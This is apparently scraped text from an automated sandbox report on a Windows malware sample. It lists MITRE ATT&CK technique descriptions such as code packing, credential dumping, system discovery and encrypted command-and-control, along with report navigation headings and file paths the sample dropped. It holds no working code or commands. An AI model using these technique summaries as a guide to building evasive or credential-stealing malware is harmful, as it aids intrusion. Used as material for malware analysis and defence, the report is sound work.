Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c4RAHq3BNl.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AFHDAKJKFCFBGCBGDHCBAFCAKE

C:\ProgramData\BAFBFCBGHDGCFHJJECAFBGDHDH

C:\ProgramData\CAAAAFBKFIECAAKECGCA

C:\ProgramData\ECFCBFBG

C:\ProgramData\EEGWXUHVUG.docx

C:\ProgramData\EFOYFBOLXA.docx

C:\ProgramData\EGIDHDGCBFBKECBFHCAFHJDBGH

C:\ProgramData\GRXZDKKVDB.xlsx

C:\ProgramData\IEHDBAAFIDGDAAAAAAAA

C:\ProgramData\IIIDAKJDHJKFHIEBFCGHCGHDGC

C:\ProgramData\JDGCFBAF

C:\ProgramData\NVWZAPQSQL.docx

C:\ProgramData\NVWZAPQSQL.xlsx

Windows Analysis Report
c4RAHq3BNl.exe

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre